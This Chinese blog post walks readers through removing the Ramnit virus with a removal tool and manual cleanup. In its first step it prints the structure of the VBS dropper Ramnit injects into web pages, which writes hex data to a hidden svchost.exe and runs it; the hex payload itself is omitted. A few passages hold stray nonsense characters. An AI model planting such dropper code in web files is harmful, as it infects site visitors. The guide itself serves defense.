1、我们蒉翟蛳庹从简介图可以看出这是个专门感染web文件的一个病毒,不单单只HTML,可能JS和PHP之类的文件也会感染。从代码上来看,我们可以看到,这是一个VBS代码,目的是让更多的人去运行(写的数据是十六进制,所以我们也不知道到底会发生什么)。试想下,我们如果作为web开发人员,把这样的文件传到服务器,会发生什么事(用户打开网站,代码敲敲的运行...)?不敢想象!代码结构如下:DropFileName = "svchost.exe"WriteData = "....................." '十六进制数据Set FSO = CreateObject("Scripting.FileSystemObject")DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSet WSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>OK,话不多说,我们开始来杀毒。我们需要的是,美国赛门铁克公司提供的Ramnit病毒专杀工具。下载好后,解压出来是一个叫FxRamnit.exe的工具。找不到的小伙伴可以给小编投票或者有得留言,留下邮箱号,小编看到会第一时间给您发。
2、双击打开之后,会跳出一个使用协议。点击 I Accept即,我同意如图
3、同意协议之后,我们会跳到工具的主页面。如图,我们点击start启动。
4、启动之后,工具会进行一个进程的扫描。我们需要做的,就是等它把进程扫完并杀死病毒。值得注意的是:工具会扫描进程以及所有硬盘的文件所以,扫描多长时间取决于电脑中的文件多少
5、扫描完毕后,点击是进行杀毒。注意:会重启电脑。重启完成之后,别动电脑。直到FxRamnit.exe文件目录下生成一个FxRamnit.log的日志文件。该日志文件内记载这病毒的位置(包括注册表位置等等)
6、另外,要说一点特别特别特别重要的事:打开计算机,搜索DesktopLayer.exe这个文件。它运行后会开启一个后门木马,卡巴斯基检测为Backdoor.Win32.IRCNite.yb。它还会将自身复制到C:\Program Files (x86)\Microsoft目录下。为了感染其它可执行文件进行传播此病毒会启动internet explorer并向ie进程中注入代码,所注入的代码会搜索可执行文件并对其进行感染。此病毒还会感染html文件,向其中加入VBS代码以释放和运行病毒。这个一般会占用我们的应用程序。如图。我们怎么删掉这个病毒呢?找到DesktopLayer.exe的位置,删除它。它会弹出文件被XXX软件中打开(例如小编这里就是QQ浏览器被感染了)。我们打开任务管理器,结束提示中的XXX软件进程,然后再删除。
7、此时我们可以这样做,来分辨是否成功清除了病毒:运行一个软件,被感染的EXE旯皱镢涛程序都会自动创建1个"程序名 + Srv".exe的程序。例如小编运行的bdcam录屏软件,病毒自动生成了一个叫bdcamSrv的可执行文件。大小55K杀完之后不会出现以上现象。怎么样?学会没?点一波关注吧?(*^__^*)
